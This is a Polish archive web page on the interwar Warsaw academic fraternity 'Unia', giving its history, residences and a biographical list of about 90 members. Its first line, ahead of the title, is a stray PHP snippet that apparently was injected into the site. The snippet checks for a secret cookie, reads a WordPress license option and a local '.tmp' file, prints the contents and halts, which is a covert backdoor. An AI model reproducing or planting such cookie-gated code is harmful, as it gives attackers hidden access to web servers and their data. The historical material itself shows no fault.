if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Unia

Dekiel Unii - vide Poszukiwania. Nazwa:
Polska Akademicka Korporacja “Unia”
Siedziba:
Warszawa
Data powstania:
czerwiec 1921 r.
Barwy:
ciemnozielona – karmazynowa – złota
Dewiza:
„Unitas vim creat” („Jedność tworzy siłę”)

Rys historyczny

Unia była jedną z pierwszych korporacji założonych w Warszawie po odzyskaniu przez Polskę niepodległości. Powstała w czerwcu 1921 r. z inicjatywy grupy 11 studentów Wydziału Prawa i Nauk Politycznych Uniwersytetu Warszawskiego. Jako podstawy ideowe wskazano sześć zasad: wolność, równość, braterstwo, jedność, zgodę i tolerancję. Korporacja została afiliowna przy przy Uniwersytecie Warszawskim, a jej kuratorem z ramienia uniwersyteckiego Senatu był prof. Ignacy Koschembahr-Łyskowski.

Komers Unii, w najniższym rzędzie od lewej: 1. Konrad Czyrski, NN, NN, NN, NN, 6. Józef Tauzowski, Warszawa 1925 r.

Od dnia 21 I 1922 r. Unia należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 10 IX 1921 r.). Prawa członka rzeczywistego uzyskała dnia 4 V 1922 r. W konsekwencji “reform” jędrzejewiczowskich po 1933 r. korporacja zanikła.

Siedziby Unii mieściły się: w latach 1924-26 w Moście Poniatowskiego (II zejście, nr 17), w roku akademickim 1927/28 przy ul. Marszałkowskiej 73/1, w roku akademickim 1928/29 przy ul. Kruczej 7/3, w roku akademickim 1929/30 w Moście Poniatowskiego (2-gi filar), w roku akademickim 1930/31 przy ul. Mokotowskiej 59/1, a w latach 1931-33 na Krakowskim Przedmieściu 14/17 (14/16).

Całkowita ustalona, niekompletna imienna lista członków korporacji obejmuje 90 nazwisk.

Brak wiadomości o powojennej działalności Unii i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Unii obejmuje 90 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Ignacy Koschembahr-Łyskowski, (3 lutego 1864 w Żelichowie pod Gdańskiem - 10 stycznia 1945 w Milanówku) absolwent Gimnazjum w Chojnicach, student prawa Uniwersytetu w Berlinie, dr praw 1888, specjalista w zakresie prawa rzymskiego i prawa cywilnego, prof. nadzw. 1895 i prof. zw. 1897 Uniwersytetu we Fryburgu, od 1900 prof. i kierownik Katedry Prawa Rzymskiego UJK, dziekan Wydziału Prawa 1908-09, od 1915 prof. UW, rektor 1923/24 oraz prorektor 1924/25, kurator i Filister honorowy Unii, dr honoris causa Uniwersytetu w Nancy
 2. Adam Ambroży Schwarz, (1878 - 1 czerwca 1934) inż. leśnik, prof. użytkowania lasu SGGW, PW i Państwowej Szkoły Mierniczej, wieloletni prezes Zawodowego Związku Leśników R.P., redaktor “Lasu Polskiego”, odznaczony m.in. Fińskim Krzyżem Komandorskim, Orderem “Białej Róży, Filister honorowy Unii, pochowany na warszawskich Powązkach

Członkowie rzeczywiści

 1. Dariusz Ajewski, c. 1924/25, akt. 1924/25
 2. Mieczysław Andrzejewski, student UW, c. 1929/30, akt. 1929/30
 3. Witold Babski, student WSH, c. 1932/33, akt. 1932/33
 4. Henryk Biederman, student WSH, c. 1925/26, akt. 1925/26-33, wiceprezes sem. let. 1927/28, prezes sem. zim. 1930/31
 5. Wojsław Bielicki, c. 1932/33, akt. 1932/33
 6. Jerzy Bogucki, c. 1925/26, akt. 1925/26
 7. Józef Buczkowski, student WSH, c. 1927/28, akt. 1927/28-30
 8. Witold Chachulski, student SGGW, c. 1924/25, akt. 1924/25-30, prezes sem. let. 1925/26
 9. Edward Curkowski, s. Tomasza i Marii z d. Dworzańskiej, student UW, c. 1929/30, akt. 1929/30-31
 10. Ziemowit Chwaściński, student WSH, akt. 1928-31

  Konrad Czyrski, lata 20-te.

 11. Konrad Czyrski, (18 listopada 1901 w Lewkowcach na Podolu - 9 stycznia 1941 w Warszawie) herbu Rawicz, s. Stanisława Maurycego i Witalisy z Konopelskich, szwagier Jana Stawiskiego (Unia), uczeń Gimnazjum na Podolu (?), ochotnik, kapral w 1 Pułku Strzelców Konnych 1 Wołyńskiej Dywizji 1919-22 (front wołyński marzec-sierpień 1919, front poleski grudzień 1919-lipiec 1920), ranny, w niewoli bolszewickiej lipiec-listopad 1920, z której uciekł, inwalida wojenny, student i absolwent 1928 leśnictwa SGGW (inż. leśnik), akt. 1925-28, wiceprezes sem. let. 1925/26, olderman sem. zim. 1927/28, po studiach komisarz ochrony lasów m.in. w Łowiczu na Wileńszczyźnie, odznaczony Srebrnym i Brązowym Krzyżem Zasługi, pochowany na Wojskowym Powązkach w Warszawie (B12, rz. 1, gr. 11)

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Elżbiety Gutowskiej-Niedziałek]

 12. Jerzy Daszewski, student SGGW, c. 1925, akt. 1925-1933, prezes sem. let. 1927/28
 13. Jerzy Dołner, student USB, od 1930 UW, akt. 1929-32, olderman sem. zim. 1930/31
 14. Juljusz Downarowicz, akt. 1932/33
 15. Stefan Falęcki, akt. 1924-26, kierownik Wydziału Finansowego sem. zim. 1924/25, olderman sem. let. 1924/25
 16. Witold Falęcki, c. 1924/25, akt. 1924/25-26
 17. Stanisław Farbowski, student SGGW, c. 1931/32, akt. 1931/32-33, sekretarz sem. zim. 1932/33
 18. Józef Franz,
 19. Jan Gierycz, student PW, c. 1924/25, akt. 1924/25-33, sekretarz sem. let. 1924/25
 20. Marjusz Stanisław Golcz, (25 kwietnia 1899 w Wilczorudzie w pow. grójeckim - 1940 w Charkowie), s. Stefana i Zofii z Borowskich, ochotnik WP, w wojnie polsko-rosyjskiej 1920 w 1 Pułku Artylerii Ciężkiej i 201 Pułku Artylerii Piechoty, student PW, od 1931 UW, założyciel Unii, akt. 1921-31, dziennikarz, redaktor PAT w Warszawie, absolwent Szkoły Podchorążych Rezerwy 1928, ppor. rez. broni pancernej, przydzielony do 9 Baonu Pancernego, w niewoli sowieckiej, zamordowany przez NKWD
 21. Włodzimierz Golcz, c. 1924/25, akt. 1924/25
 22. Maksymilian Górkiewicz, student PW, c. 1927/28, akt. 1927/28-29
 23. Olgierd Grabianko, c. 1924/25, akt. 1924/25
 24. Jan Grabowski, student WSH, c. 1927/28, akt. 1927/28-33, wiceprezes sem. let. 1929/30
 25. Zygmunt Gromnicki, student SGGW, c. 1925/26, akt. 1925/26-28
 26. Piotr Grzybowski, student WSH, c. 1924/25, akt. 1924/25-33, wiceprezes sem. let. 1928/29
 27. Idzi Guderski, c. 1925/26, akt. 1925/26
 28. Włodzimierz Hajdrych, student UW, c. 1927/28, akt. 1927/28
 29. Roman Hoppe, student UW, c. 1929/30, akt. 1929/30-31
 30. Tadeusz Hornowski, c. 1924/25, akt. 1924/25-26
 31. Kazimierz Iwiński, student UW, c. 1929/30, akt. 1929/30-33, sekretarz sem. zim. 1930/31, wiceprezes sem. zim. 1931/32
 32. Stanisław Jasiński, student WSH, c. 1931/32, akt. 1931/32-33
 33. Tadeusz Jerzmanowski, student UW, c. 1930/31, akt. 1930/31-33, sekretarz sem. zim. 1931/32, prezes sem. zim. 1932/33
 34. Stanisław Jędrzejewski, student UW, c. 1931/32, akt. 1931/32-33
 35. Stefan Kaczmarski, c. 1925/26, akt. 1925/26
 36. Jerzy Kassakajtis, student SGGW, od 1930 USB, akt. 1927-32
 37. Kazimierz Kopczyński, student USB, c. 1924/25, akt. 1924/25-32
 38. Stanisław Kossobudzki, student WSH, c. 1927/28, akt. 1927/28-33, w początkach lat 30-tych pracownik Konsultatu RP w Tyfilisie (Związek Radziecki)
 39. Daniel Kotowicz, student UW, akt. 1929/30
 40. Lucjan Kowalewski, student PW, od 1931 student SGGW, c. 1930/31, akt. 1930/31-33
 41. Franciszek Kozłowski, student PW, c. 1925, akt. 1925-29, olderman sem. let. 1928/29
 42. Leon Kral, student PW, c. 1931/32, akt. 1931/32-33
 43. Jerzy Lewandowski, student PW, c. 1925/26, akt. 1925/26-30
 44. Michał Łapienis, akt. 1924-25, kierownik Wydziału Naukowego sem. zim. 1924/25, wiceprezes sem. let. 1924/25
 45. Antoni Łączkowski, c. 1925/26, akt. 1925/26
 46. Henryk Majewski, c. 1925/26, akt. 1925/26
 47. Przemysław Meinhart, brat (?) Ziemisława (Unia), student UW, c. 1930/31, akt. 1930/31-33
 48. Ziemisław Meinhart, brat (?) Przemysława (Unia), student WSH, c. 1929/30, akt. 1929/30-33
 49. Kazimierz Mencel, akt. 1924-25

  Leon Michalewski, 1929/30 r.

 50. Leon Michalewski, (20 lutego 1905 - 17 maja 1944 pod Monte Cassino) s. Józefa i Anieli ze Studzińskich, student WSH, c. 1927/28, akt. 1927/28-31, sekretarz sem. let. 1928/29, prezes sem. let. 1929/30, olderman sem. zim. 1931/32, wiceprezes sem. zim. 1932/33, pracował w Banku Gospodarstwa Krajowego w Warszawie, zmobilizowany w 1939 walczył w wojnie obronnej jako por. 6 Pułku Legionów z Wilna, wzięty do niewoli rosyjskiej, wszedł w skład II Korpusu PSZ, kapitan, dowódca 4 kompanii pod Monte Cassino, ciężko ranny, nie pozwalał się ratować wydając komendy “Naprzód”, pochowany na cmentarzu polskim w Monte Cassino (zob. Melchior Wańkowicz, Monte Cassino, ss. 194, 213-214, 219)

  [Źródła (poza wskazanymi poniżej spisu członków): relacje Krzysztofa Michalewskiego i Elżbiety Gutowskiej-Niedziałek]

 51. Edmund Mieroszewicz (Miroszewicz), pierwszy sekretarz wewn. ZPKA 1922-23 (I kadencja), prezes Związku Filistrów Unii (1928)
 52. Włodzimierz Mikusiński, c. 1924/25, akt. 1924/25
 53. Czesław Nadolski, student UW, c. 1931/32, akt. 1931/32-33
 54. Jan Naumoff-Ostrowski, student UW, akt. 1924-32
 55. Mieczysław Nergier, c. 1925/26, akt. 1925/26
 56. Bohdan Nowakowski, student UW, c. 1927/28, akt. 1927/28
 57. Jerzy Ordyński, student WSH, akt. 1927-33, olderman sem. let. 1929/30
 58. Witold Parowski, student SGGW, c. 1925/26, akt. 1925/26-33
 59. Jan Pawczyński, student UW, c. 1929/30, akt. 1929/30-32, wiceprezes sem. zim. 1930/31

  Eugeniusz Piwnicki, 1929/30 r.

 60. Eugeniusz Piwnicki, ( - lata 60-te) student UW, c. 1925/26, akt. 1925/26-33, olderman sem. let. 1927/28, prezes sem. let. 1928/29, mieszkał w Warszawie

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Elżbiety Gutowskiej-Niedziałek]

 61. Jerzy Przybylski, student WSH, c. 1927/28, akt. 1927/28-33, sekretarz sem. let. 1929/30
 62. Stanisław Przyłuski, c. 1932/33, akt. 1932/33
 63. Zenon Raczkowski, student WSH, c. 1929/30, akt. 1929/30-33
 64. Czesław Romański, student SGGW, c. 1929/30, akt. 1929/30-33
 65. Władysław Rożnowski, c. 1925, akt. 1925
 66. Wacław Sapiński, student PW, akt. 1927-33
 67. Gustaw Sennewald, c. 1924/25, akt. 1924/25
 68. Wacław Sikorski, akt. 1924-25
 69. Jan Skiendzielewski, student SGGW, c. 1925/26, akt. 1925/26-32
 70. Jerzy Sobolewski, akt. 1924-26, sekretarz sem. zim. 1924/25
 71. Jan Sommer, akt. 1924-26
 72. Jan Stański, c. 1925/26, akt. 1925/26

  Jan Stawiski, 1927 r.

 73. Jan Stawiski, (6 czerwca 1904 w Zduńskiej Woli - 6/7 sierpnia 1944 w Warszawie) herbu Gozdawa, s. Edmunda i Stanisławy z Kobyłeckich, wnuk Feliksa (Konwent Polonia), szwagier Konrada Czyrskiego (Unia), prawd. uczeń Gimnazjum w Zduńskiej Woli bądź Sieradzu, student WSH, akt. 1927-33, skarbnik 1932/33, po studiach urzędnik w Ministerstwie Rolnictwa w Warszawie, rozstrzelany przez Verbrennungskomando w Hali Mirowskiej w zbiorowej egzekucji podczas tzw. rzezi Woli w czasie powstania warszawskiego, pochowany na Cmentarzu Powstańców na Woli (kw. 125, znaczek grobowy PCK 7704)

  [Źródła (poza wskazanymi poniżej spisu członków): relacja Elżbiety Gutowskiej-Niedziałek]

  Jan Stożkowski, 1924 r.

 74. Jan Józef Stożkowski, (20 maja 1904 w Guzowie - 1 marca 1942 w miejsc. Merke w Kazachstanie) s. Antoniego i Heleny z d. Jarczyńskiej, absolwent Gimnazjum Kazimierza Kulwiecia w Warszawie, student rolnictwa SGGW, c. 1925, akt. 1925-30, po studiach pracował w Monopolu Tytoniowym, tuż przed wojną w Borszczowie w woj. tarnopolskim, po wybuchu II wojny światowej aresztowany przez Rosjan i wywieziony do Rosji, wstąpił do PSZ w ZSRR gen. Władysława Andersa, zmarł w szpitalu wojskowym, pochowany prawd. w zbiorowej mogile k. Merke

 75. Jerzy Szaniawski, c. 1925, akt. 1925
 76. Jerzy Szyszko, c. 1925, akt. 1925-26
 77. Bernard Śmielewski, student PW, c. 1931/32, akt. 1931/32-33

  Bronisław Świątkowski, prawd. ok. 1925 r. (?).

 78. Bronisław Świątkowski, student SGGW, akt. 1925-30, sekretarz sem. let. 1925/26

  Józef Tauzowski, lata 20-te.

 79. Józef Tauzowski, (26 lipca 1899 w Ostroj Górce w par. WNMP w Sosnowcu - 15 czerwca 1976 w Warszawie) z rodziny szlacheckiej wywodzącej się z Ziemi Siewierskiej, s. Edmunda Stanisława i Marianny Władysławy z d. Plucińska, student WSH, akt. 1925-33, prezes sem. zim. 1927/28, prezes sem. zim. 1931/32, po wojnie dyrektor i członek Zarządu Towarzystwa Ubezpieczeń i Reasekuracji “Warta”, inicjator, organizator, pierwszy dyrektor Polskiego Rejestru Statków, odznaczony m.in. Krzyżem Polonia Restituta, Złotym i Srebrnym Krzyżem Zasługi, Złotą Odznaką “Zasłużony Pracownik Morza”, Odznaką honorową “Zasłużonym Ziemi Gdańskiej”, pochowany na cywilnych Powązkach w Warszawie (przy Kościele pw. św. Karola Boromeusza) [Źródła (poza wskazanymi poniżej spisu członków): relacja Elżbiety Gutowskiej-Niedziałek oraz krewnego Marka Piotra Wójcickiego]

 80. Jan Trzaska, student PW, akt. 1924-33
 81. Jerzy Antoni Turski, (8 kwietnia 1904 w Kijowie - 1940 w Katyniu), s. Antoniego i Ludwiki z Czerniawskich, ochotnik w wojnie polsko-rosyjskiej 1920, student i absolwent prawa UW 1929, c. 1925 (?), akt. 1925-30, w 1937 wiceprokurator Sądu Okręgowego w Warszawie, aresztowany 26 IX 1939 przez NKWD we wsi Wołkowyja, zamordowany przez NKWD
 82. Wiesław Winiarski, student UW, c. 1932/33, akt. 1932/33
 83. Witold Winiarski, student UW, akt. 1927-33
 84. Mieczysław Wróblewski, student UW, c. 1925, akt. 1925-33, sekretarz sem. let. 1927/28
 85. Zygmunt Zaleski, akt. 1924-25, prezes sem. zim. 1924/25
 86. Aleksander Zambrzycki, akt. 1924-25, olderman sem. zim. 1924/25
 87. Bohdan Zembrzuski, akt. 1924-25, wiceprezes sem. zim. 1924/25, prezes sem. let. 1924/25
 88. Zdzisław Zieliński, student WSH, c. 1924/25, akt. 1924/25-31
 89. Aleksander Żelazny, student PW, akt. 1927-33

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1924-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 2 IX 2010 r.
Ostatnia zmiana: 22 V 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka “Unia” (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 22 V 2020 r.

Czarna Kawa Unii, w najwyższym rzędzie stoi pierwszy od lewej Jan Stawiski, w drugim rzędzie od góry od lewej 18. Leon Michalewski (z szafą i w białej muszce), 19. NN, 20. NN, 21. NN, 22. Eugeniusz Piwnicki, 23. Konrad Czyrski, 24. Józef Tauzowski, 25. NN, siedzą od lewej: 11. Lucyna Czyrska (w białej sukni, z kokardą na białym ramieniu, żona Konrada Czyrskiego), Warszawa 1929/30 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }